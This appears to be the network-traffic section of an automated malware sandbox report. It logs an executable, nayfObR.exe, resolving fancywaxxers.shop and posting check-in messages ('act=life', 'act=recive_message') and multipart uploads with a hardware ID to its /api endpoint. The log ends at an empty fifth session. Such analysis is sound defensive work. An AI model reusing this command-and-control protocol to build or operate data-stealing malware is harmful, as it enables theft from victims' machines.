Jan 3, 2025 14:33:57.173114061 CET	61487	53	192.168.2.5	1.1.1.1
Jan 3, 2025 14:33:57.185899973 CET	53	61487	1.1.1.1	192.168.2.5
Jan 3, 2025 14:34:17.404308081 CET	53	64926	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 14:33:57.173114061 CET	192.168.2.5	1.1.1.1	0x1254	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 14:33:57.185899973 CET	1.1.1.1	192.168.2.5	0x1254	No error (0)	fancywaxxers.shop	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:33:57.185899973 CET	1.1.1.1	192.168.2.5	0x1254	No error (0)	fancywaxxers.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:33:57.185899973 CET	1.1.1.1	192.168.2.5	0x1254	No error (0)	fancywaxxers.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:33:57.185899973 CET	1.1.1.1	192.168.2.5	0x1254	No error (0)	fancywaxxers.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:33:57.185899973 CET	1.1.1.1	192.168.2.5	0x1254	No error (0)	fancywaxxers.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:33:57.185899973 CET	1.1.1.1	192.168.2.5	0x1254	No error (0)	fancywaxxers.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:33:57.185899973 CET	1.1.1.1	192.168.2.5	0x1254	No error (0)	fancywaxxers.shop	104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.32.1	443	6540	C:\Users\user\Desktop\nayfObR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:33:57 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2025-01-03 13:33:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-03 13:33:58 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 13:33:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0nmk4395d19epm7h0ooc79dm8h; expires=Tue, 29 Apr 2025 07:20:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pj%2BJA7r1NLT4uIivCThAcLx3Y2gU8ymJpHQbWNHFYzj%2BN%2FPOqIKCWkZXufudB2ANx3wWZYAJ3wAytnWSDtcEs0SQb4sIPKcmLhsIGCIJ9D%2Fz5AwvJimVdsFoSg83zffzdWpnkw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc35d141d1bc327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1674&rtt_var=640&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1694718&cwnd=189&unsent_bytes=0&cid=ce5df53757f508e0&ts=472&x=0"
2025-01-03 13:33:58 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-03 13:33:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.32.1	443	6540	C:\Users\user\Desktop\nayfObR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:33:58 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: fancywaxxers.shop
2025-01-03 13:33:58 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 37 74 78 32 6a 6f 2d 2d 35 31 36 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=7tx2jo--516&j=
2025-01-03 13:33:59 UTC	1130	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 13:33:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4qcle3p4i6r6n65gfo33o42uv6; expires=Tue, 29 Apr 2025 07:20:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0UONK703X2xf3apiKKG%2Fdqupjvo7ORQiWejmVNG%2Bm1GYYKSY0dNpjBnt5UmQ1f6aJskh0nUsgyMxC0zZPXbfjkzFf7Z1E%2FRnRmfyJ65ZCai%2FR26LnumNSTL90WMHnBfmeT9UYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc35d19ae3c4344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1761&rtt_var=666&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=946&delivery_rate=1634938&cwnd=47&unsent_bytes=0&cid=354c3e8f73ba52ff&ts=492&x=0"
2025-01-03 13:33:59 UTC	239	IN	Data Raw: 34 36 66 0d 0a 2f 4b 6a 78 69 54 41 47 52 65 70 30 66 45 59 78 59 78 59 42 4d 63 4f 68 68 33 36 52 34 51 6a 50 42 76 77 46 7a 4d 6e 4b 35 6c 53 48 69 6f 65 72 43 6a 4a 70 79 41 63 5a 5a 41 73 58 5a 48 52 55 37 34 50 6d 47 72 50 62 62 71 35 71 6a 32 44 67 36 37 79 4c 64 73 62 4f 6b 4f 56 44 59 32 6e 49 45 51 52 6b 43 7a 68 74 49 31 53 74 67 37 31 63 39 49 74 71 72 6d 71 65 5a 4b 65 6d 75 6f 6f 33 6c 4d 53 57 34 56 56 6c 49 59 73 59 45 53 4e 55 42 6e 64 72 58 36 72 4d 37 78 4f 7a 7a 53 71 71 66 4e 34 2f 37 6f 53 76 6b 6a 57 78 79 59 4c 69 45 6e 74 70 6b 56 59 5a 4b 42 4e 5a 4e 47 42 55 6f 63 33 68 47 76 71 4a 59 4b 64 69 6e 32 47 6d 75 61 4f 41 50 4a 54 4b 6c 65 42 66 62 44 57 47 45 68 59 6f 55 67 78 33 49 78 Data Ascii: 46f/KjxiTAGRep0fEYxYxYBMcOhh36R4QjPBvwFzMnK5lSHioerCjJpyAcZZAsXZHRU74PmGrPbbq5qj2Dg67yLdsbOkOVDY2nIEQRkCzhtI1Stg71c9ItqrmqeZKemuoo3lMSW4VVlIYsYESNUBndrX6rM7xOzzSqqfN4/7oSvkjWxyYLiEntpkVYZKBNZNGBUoc3hGvqJYKdin2GmuaOAPJTKleBfbDWGEhYoUgx3Ix
2025-01-03 13:33:59 UTC	903	IN	Data Raw: 33 68 78 50 31 63 71 38 4d 35 6e 32 65 50 64 72 75 6d 75 49 4a 32 67 59 53 4b 71 31 56 6f 5a 39 42 57 46 69 68 64 42 48 64 73 56 4b 44 44 39 78 50 7a 67 47 4b 6c 59 4a 52 6f 6f 61 53 6d 6a 6a 47 57 77 35 54 6b 56 57 77 68 68 78 56 65 61 68 4d 47 62 43 4d 4c 34 65 50 31 48 2f 43 58 5a 37 77 6b 67 53 6d 33 36 36 2b 49 64 73 61 4b 6c 65 56 54 61 53 65 61 48 68 55 76 56 68 4e 2f 61 6c 36 73 77 2b 67 57 2f 49 42 71 71 6d 36 55 61 4b 53 76 70 59 6b 77 6e 73 72 54 70 52 4a 6a 50 38 68 4f 58 67 64 57 45 58 4e 76 52 65 50 35 70 51 4f 39 6d 69 71 71 61 4e 34 2f 37 71 4f 74 68 7a 57 56 78 5a 44 6a 57 58 59 6e 6d 68 41 54 49 55 45 48 63 57 31 5a 6f 74 48 76 45 76 57 41 59 36 5a 74 6d 32 43 71 36 2b 62 45 4d 59 61 4b 79 36 74 7a 61 53 79 45 48 41 6b 6b 45 78 34 36 65 Data Ascii: 3hxP1cq8M5n2ePdrumuIJ2gYSKq1VoZ9BWFihdBHdsVKDD9xPzgGKlYJRooaSmjjGWw5TkVWwhhxVeahMGbCML4eP1H/CXZ7wkgSm366+IdsaKleVTaSeaHhUvVhN/al6sw+gW/IBqqm6UaKSvpYkwnsrTpRJjP8hOXgdWEXNvReP5pQO9miqqaN4/7qOthzWVxZDjWXYnmhATIUEHcW1ZotHvEvWAY6Ztm2Cq6+bEMYaKy6tzaSyEHAkkEx46e
2025-01-03 13:33:59 UTC	1369	IN	Data Raw: 34 35 32 35 0d 0a 4b 73 35 77 6b 74 43 53 5a 61 2b 37 7a 36 49 73 35 6b 63 4b 54 36 6c 5a 70 49 34 6b 62 45 69 31 51 44 58 68 72 58 71 33 48 36 68 54 37 67 47 4b 2f 61 70 42 68 71 4b 75 74 78 48 6a 65 7a 59 75 72 43 69 51 44 68 67 45 4b 4c 78 45 30 64 32 31 64 70 74 57 6c 41 37 32 61 4b 71 70 6f 33 6a 2f 75 70 61 57 50 4f 70 6e 44 6b 75 68 53 62 69 6d 48 48 42 59 73 55 77 78 31 61 46 75 6e 7a 75 34 54 2f 49 52 69 72 6d 69 62 61 71 33 72 35 73 51 78 68 6f 72 4c 71 33 64 71 4a 4a 6b 48 58 42 46 51 44 33 70 6b 52 65 48 63 71 77 57 7a 68 47 62 74 50 4e 35 74 71 61 79 73 69 54 79 64 7a 70 66 6d 58 57 30 75 67 51 51 55 4b 46 30 54 65 57 6c 57 72 38 2f 67 45 2f 4f 43 61 36 4e 75 6c 53 66 67 36 36 2b 63 64 73 61 4b 76 4f 5a 43 64 69 32 44 42 31 77 52 55 41 39 36 Data Ascii: 4525Ks5wktCSZa+7z6Is5kcKT6lZpI4kbEi1QDXhrXq3H6hT7gGK/apBhqKutxHjezYurCiQDhgEKLxE0d21dptWlA72aKqpo3j/upaWPOpnDkuhSbimHHBYsUwx1aFunzu4T/IRirmibaq3r5sQxhorLq3dqJJkHXBFQD3pkReHcqwWzhGbtPN5tqaysiTydzpfmXW0ugQQUKF0TeWlWr8/gE/OCa6NulSfg66+cdsaKvOZCdi2DB1wRUA96
2025-01-03 13:33:59 UTC	1369	IN	Data Raw: 7a 6d 43 76 6e 44 64 65 4e 39 33 6d 43 69 36 2f 44 45 50 4a 4c 4f 6b 4f 64 62 61 43 71 4a 45 68 6b 70 56 77 46 79 5a 56 61 67 79 4f 30 51 2f 49 6c 6d 71 57 69 58 59 61 4b 6f 71 34 4a 32 30 49 71 55 38 78 49 38 5a 36 6b 62 46 53 68 54 41 6d 56 6b 45 2b 2b 44 36 78 72 7a 77 7a 4b 37 64 49 6c 67 73 65 57 78 78 44 47 53 69 73 75 72 57 48 59 69 68 68 49 55 49 56 63 4e 66 6d 4e 57 73 38 76 6a 47 2f 2b 4c 62 36 4a 69 6d 32 71 70 6f 4b 75 57 4a 4a 33 4f 6e 65 63 53 4b 6d 65 50 44 6c 35 38 45 79 52 6a 59 45 4f 6e 77 4b 55 44 76 5a 6f 71 71 6d 6a 65 50 2b 36 72 70 6f 67 39 6d 63 47 59 37 31 5a 6b 4b 6f 4d 59 45 43 31 66 43 58 68 6b 51 61 7a 47 37 52 62 36 68 6d 61 67 5a 34 78 6b 72 2b 76 6d 78 44 47 47 69 73 75 72 64 56 63 51 71 31 59 42 61 6b 70 42 63 32 38 54 2b Data Ascii: zmCvnDdeN93mCi6/DEPJLOkOdbaCqJEhkpVwFyZVagyO0Q/IlmqWiXYaKoq4J20IqU8xI8Z6kbFShTAmVkE++D6xrzwzK7dIlgseWxxDGSisurWHYihhIUIVcNfmNWs8vjG/+Lb6Jim2qpoKuWJJ3OnecSKmePDl58EyRjYEOnwKUDvZoqqmjeP+6rpog9mcGY71ZkKoMYEC1fCXhkQazG7Rb6hmagZ4xkr+vmxDGGisurdVcQq1YBakpBc28T+
2025-01-03 13:33:59 UTC	1369	IN	Data Raw: 38 69 43 71 79 4b 6f 63 6e 71 61 66 6f 33 48 61 5a 77 70 76 6c 55 57 49 73 68 42 6f 66 4c 56 55 45 66 47 52 63 70 73 72 69 48 50 57 52 62 61 42 74 6e 6d 79 6e 6f 61 79 46 50 64 36 45 30 2b 78 4b 4a 48 2f 49 4a 42 6b 79 51 77 49 30 66 42 32 34 67 2b 49 51 73 39 73 71 6f 48 61 66 59 72 79 76 70 34 38 6b 6c 63 79 54 37 6b 42 6a 4b 34 49 5a 48 53 78 65 41 6e 78 78 55 36 7a 44 39 77 37 31 69 47 54 74 4b 74 35 67 74 75 76 77 78 41 65 4a 77 64 50 30 48 48 31 6e 6a 78 70 65 66 42 4d 43 66 6d 35 64 73 38 66 6a 46 2f 43 4e 59 71 68 73 6d 6d 32 6a 70 4b 4f 4f 50 35 62 4b 6e 4f 35 61 62 79 47 47 46 78 67 6f 58 6b 45 36 49 31 53 35 67 37 31 63 31 4a 6c 6e 71 33 4f 50 55 71 6d 72 2b 63 51 70 30 4e 50 54 37 46 34 6b 66 38 67 62 45 69 35 65 42 48 42 72 56 4b 4c 43 36 52 Data Ascii: 8iCqyKocnqafo3HaZwpvlUWIshBofLVUEfGRcpsriHPWRbaBtnmynoayFPd6E0+xKJH/IJBkyQwI0fB24g+IQs9sqoHafYryvp48klcyT7kBjK4IZHSxeAnxxU6zD9w71iGTtKt5gtuvwxAeJwdP0HH1njxpefBMCfm5ds8fjF/CNYqhsmm2jpKOOP5bKnO5abyGGFxgoXkE6I1S5g71c1Jlnq3OPUqmr+cQp0NPT7F4kf8gbEi5eBHBrVKLC6R
2025-01-03 13:33:59 UTC	1369	IN	Data Raw: 37 54 7a 65 61 61 4f 74 71 59 55 2b 6c 73 71 56 34 56 5a 6e 4c 6f 73 52 46 79 4a 59 41 6e 35 73 56 4b 66 48 35 52 66 30 6a 57 79 6f 62 35 63 6e 34 4f 75 76 6e 48 62 47 69 72 58 49 51 48 59 56 68 68 55 46 5a 45 78 50 62 53 4e 55 72 59 4f 39 58 50 69 4c 5a 62 39 68 6c 32 2b 71 6f 71 69 41 50 4a 50 4e 6b 2b 35 66 59 53 4f 47 45 68 6b 6b 58 77 35 7a 61 31 79 6c 77 2b 70 63 76 63 4e 74 74 53 54 47 4a 34 36 67 76 71 55 34 6c 64 6a 54 39 42 78 39 5a 34 38 61 58 6e 77 54 44 33 31 69 57 36 2f 50 37 52 6a 68 67 32 47 6b 61 35 39 6f 72 71 69 70 6a 6a 36 4d 7a 4a 50 67 57 6d 4d 76 6a 42 67 4d 4a 56 78 42 4f 69 4e 55 75 59 4f 39 58 4d 4b 56 62 61 70 72 33 45 36 70 73 4b 6d 4f 4e 5a 58 47 30 2f 51 63 66 57 65 50 47 6c 35 38 45 77 78 34 62 6c 65 7a 7a 2b 55 63 2b 6f 52 Data Ascii: 7TzeaaOtqYU+lsqV4VZnLosRFyJYAn5sVKfH5Rf0jWyob5cn4OuvnHbGirXIQHYVhhUFZExPbSNUrYO9XPiLZb9hl2+qoqiAPJPNk+5fYSOGEhkkXw5za1ylw+pcvcNttSTGJ46gvqU4ldjT9Bx9Z48aXnwTD31iW6/P7Rjhg2Gka59orqipjj6MzJPgWmMvjBgMJVxBOiNUuYO9XMKVbapr3E6psKmONZXG0/QcfWePGl58Ewx4blezz+Uc+oR
2025-01-03 13:33:59 UTC	1369	IN	Data Raw: 47 4b 76 70 36 4b 44 4f 49 7a 4c 6d 65 64 54 59 79 43 44 42 42 55 32 57 41 6c 33 62 56 75 6f 77 2b 73 63 38 6f 35 71 37 53 72 65 59 4c 62 72 38 4d 51 54 76 64 32 46 34 52 42 48 4d 4a 34 63 47 53 68 46 43 6e 56 67 52 61 7a 54 70 56 4b 7a 6b 6d 32 38 4a 4d 5a 78 76 72 79 76 6d 33 69 48 69 70 54 6e 45 6a 78 6e 67 78 6b 51 4b 56 67 46 66 57 5a 62 6f 73 62 67 46 76 2b 50 61 36 56 74 6c 47 4b 72 72 61 4b 48 4f 4a 48 4c 6e 2b 39 62 61 69 37 49 57 46 34 6a 53 30 45 73 49 32 57 78 78 50 30 52 34 38 46 59 72 6e 57 50 63 71 4f 37 72 73 59 5a 6e 63 61 51 37 6c 56 30 5a 35 64 59 42 32 52 55 44 54 51 37 45 36 48 48 36 52 2f 30 6a 57 57 67 61 35 6c 73 6f 61 47 6d 6c 6a 6d 62 77 70 2f 6a 58 33 59 74 67 67 51 58 4c 56 34 50 66 48 46 51 34 59 32 6c 47 2b 76 44 4d 75 31 57 Data Ascii: GKvp6KDOIzLmedTYyCDBBU2WAl3bVuow+sc8o5q7SreYLbr8MQTvd2F4RBHMJ4cGShFCnVgRazTpVKzkm28JMZxvryvm3iHipTnEjxngxkQKVgFfWZbosbgFv+Pa6VtlGKrraKHOJHLn+9bai7IWF4jS0EsI2WxxP0R48FYrnWPcqO7rsYZncaQ7lV0Z5dYB2RUDTQ7E6HH6R/0jWWga5lsoaGmljmbwp/jX3YtggQXLV4PfHFQ4Y2lG+vDMu1W
2025-01-03 13:33:59 UTC	1369	IN	Data Raw: 54 6d 78 43 37 65 6b 74 50 65 55 57 6f 70 6a 77 41 50 61 58 49 4d 66 32 39 65 72 73 69 6c 55 72 4f 46 4b 76 55 30 30 43 65 71 75 75 6a 63 5a 73 79 52 78 72 67 46 4e 48 57 58 57 41 64 6b 52 55 45 73 4d 52 33 68 30 61 56 45 73 38 52 70 76 33 61 59 5a 4c 69 6f 37 37 6f 49 76 64 32 46 34 55 6b 6d 41 59 38 48 46 7a 4a 65 45 30 70 64 66 61 7a 43 35 68 4b 78 73 6e 79 67 64 4a 31 69 71 5a 57 57 69 6a 47 4b 7a 5a 33 74 55 69 52 70 79 42 6c 65 66 47 70 42 50 43 4e 73 37 34 50 39 58 4b 76 44 58 36 35 71 6b 47 43 34 75 75 57 6e 49 59 6a 41 69 4b 6c 30 59 7a 61 42 41 42 4d 32 45 30 38 30 5a 52 50 35 6b 36 74 63 39 35 49 71 39 54 54 4d 50 50 76 34 2f 39 52 6b 67 59 53 4b 71 30 51 6b 66 39 70 59 58 6a 59 54 57 54 51 6b 55 4c 50 52 34 78 2f 6c 67 43 32 54 57 72 35 73 75 Data Ascii: TmxC7ektPeUWopjwAPaXIMf29ersilUrOFKvU00CequujcZsyRxrgFNHWXWAdkRUEsMR3h0aVEs8Rpv3aYZLio77oIvd2F4UkmAY8HFzJeE0pdfazC5hKxsnygdJ1iqZWWijGKzZ3tUiRpyBlefGpBPCNs74P9XKvDX65qkGC4uuWnIYjAiKl0YzaBABM2E080ZRP5k6tc95Iq9TTMPPv4/9RkgYSKq0Qkf9pYXjYTWTQkULPR4x/lgC2TWr5su
2025-01-03 13:33:59 UTC	1369	IN	Data Raw: 6b 78 5a 2f 41 76 41 49 32 4f 4d 59 50 58 6a 49 54 57 53 59 74 45 37 4f 44 76 56 79 30 67 48 69 2f 59 70 31 78 72 65 79 57 75 67 4f 64 78 4a 33 73 52 46 45 6b 6d 52 55 65 4c 32 30 2f 56 57 31 59 70 73 2f 7a 49 73 32 32 61 61 4e 71 6d 58 47 2f 36 2b 62 45 4f 64 36 53 71 71 73 61 4a 42 6a 47 56 67 5a 6b 43 30 46 42 59 46 32 76 78 50 4d 4e 76 72 5a 70 76 47 65 65 62 4f 37 6c 36 49 4a 32 78 70 6a 64 71 31 5a 31 5a 39 42 47 54 48 38 47 55 69 4d 7a 41 62 36 4e 2f 46 7a 6c 77 7a 4c 2f 4b 74 35 31 37 76 50 6f 77 7a 57 4d 32 4a 58 6f 52 47 64 67 74 69 67 34 4a 31 51 48 64 32 31 45 73 49 48 4b 48 2f 69 50 5a 71 70 79 6f 46 6d 37 71 4b 61 4b 4d 59 6a 62 30 36 55 53 61 32 66 51 4c 31 34 31 57 51 59 34 4b 78 2b 77 30 4f 73 58 35 59 51 71 6b 69 72 65 66 2b 37 7a 36 4c Data Ascii: kxZ/AvAI2OMYPXjITWSYtE7ODvVy0gHi/Yp1xreyWugOdxJ3sRFEkmRUeL20/VW1Yps/zIs22aaNqmXG/6+bEOd6SqqsaJBjGVgZkC0FBYF2vxPMNvrZpvGeebO7l6IJ2xpjdq1Z1Z9BGTH8GUiMzAb6N/FzlwzL/Kt517vPowzWM2JXoRGdgtig4J1QHd21EsIHKH/iPZqpyoFm7qKaKMYjb06USa2fQL141WQY4Kx+w0OsX5YQqkiref+7z6L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.32.1	443	6540	C:\Users\user\Desktop\nayfObR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:33:59 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PL97KM6X4KL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12791 Host: fancywaxxers.shop
2025-01-03 13:33:59 UTC	12791	OUT	Data Raw: 2d 2d 50 4c 39 37 4b 4d 36 58 34 4b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 50 4c 39 37 4b 4d 36 58 34 4b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4c 39 37 4b 4d 36 58 34 4b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 50 4c 39 37 4b 4d 36 58 34 4b 4c 0d 0a 43 6f 6e 74 65 6e Data Ascii: --PL97KM6X4KLContent-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--PL97KM6X4KLContent-Disposition: form-data; name="pid"2--PL97KM6X4KLContent-Disposition: form-data; name="lid"7tx2jo--516--PL97KM6X4KLConten
2025-01-03 13:34:00 UTC	1132	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 13:34:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bune9sallrprl3be8f69koqr8n; expires=Tue, 29 Apr 2025 07:20:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlJ9R%2BkmB252RU3S55HMzcBgHh9QWNIDwdmMer6zphF0RcWo4kcbJCvmBXVmoGR5jfkgrv%2Fy7xe2SqXBW2VslSgMDdqrlwW%2BJyhDan0dnmsanlqeov5i1oWTV3urBQdLN1Lgzg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc35d20fc891875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1600&rtt_var=626&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2842&recv_bytes=13725&delivery_rate=1710603&cwnd=153&unsent_bytes=0&cid=3dd98c5eb5ee0d25&ts=736&x=0"
2025-01-03 13:34:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 13:34:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.32.1	443	6540	C:\Users\user\Desktop\nayfObR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:34:01 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PDDNHW1VY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15021 Host: fancywaxxers.shop
2025-01-03 13:34:01 UTC	15021	OUT	Data Raw: 2d 2d 50 44 44 4e 48 57 31 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 50 44 44 4e 48 57 31 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 44 44 4e 48 57 31 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 50 44 44 4e 48 57 31 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --PDDNHW1VYContent-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--PDDNHW1VYContent-Disposition: form-data; name="pid"2--PDDNHW1VYContent-Disposition: form-data; name="lid"7tx2jo--516--PDDNHW1VYContent-Dispos
2025-01-03 13:34:01 UTC	1138	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 13:34:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qgglau9hch426nqp73lugb4q33; expires=Tue, 29 Apr 2025 07:20:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4K3uTMI5orQ3NZ%2BXZ7Qwbo0%2FSW8ik%2BTj28fSgJWJMPeVqsjLxQeAv01YgshHffnZMLl%2FGiitCSPOJxyEcO1pp7zHFV79%2BYyG6r%2BUPt2D9CTtPKgHJ3PujkkzaremzI0g10vkGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc35d294ad51875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1568&rtt_var=608&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15953&delivery_rate=1769696&cwnd=153&unsent_bytes=0&cid=93f64c74fdb18d35&ts=506&x=0"
2025-01-03 13:34:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 13:34:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.32.1	443	6540	C:\Users\user\Desktop\nayfObR.exe

Timestamp	Bytes transferred	Direction	Data
